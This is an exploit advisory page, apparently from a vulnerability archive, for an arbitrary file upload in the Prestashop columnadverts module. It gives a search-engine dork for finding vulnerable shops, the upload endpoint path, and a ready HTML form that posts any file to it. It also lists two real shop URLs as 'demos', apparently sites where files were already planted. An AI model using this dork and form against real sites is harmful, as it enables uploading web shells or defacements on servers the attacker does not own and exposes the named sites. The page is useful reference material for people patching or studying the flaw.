Prestashop columnadverts module Arbitrary File Upload

2016.08.21

Credit: HxN

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:"/modules/columnadverts2/" or inurl:"/modules/columnadverts/"

##############################################################
> Exploit Title: Prestashop Arbitrary File Upload
> Exploit Author: HxN | facebook.com/CowoKerensTeam
> Dork : inurl:"/modules/columnadverts2/" or inurl:"/modules/columnadverts/"
> Website : https://www.prestashop.com/
> Date : 2016/08/21
> Tested on : Ubuntu , Win 8

############################################################
POC :

target.il/modules/columnadverts2/uploadimage.php

target.il/modules/columnadverts2/uploadimage.php

Vuln : "error"


##############################################################
CSRF :

 <form method="POST" action="target.il/modules/namemodule/uploadimage.php"
  enctype="multipart/form-data">
 <input type="file" name="userfile" /><button>Upload</button>
 </form>


###############################################################
> DEMO :

> http://www.rossoregale.com/modules/homepageadvertise2/slides/id.htm
> http://orita.es/modules/homepageadvertise2/slides/id.htm

##############################################################

References:

http://facebook.com/CowoKerensTeam

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Prestashop columnadverts module Arbitrary File Upload

Dork: inurl:"/modules/columnadverts2/" or inurl:"/modules/columnadverts/"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.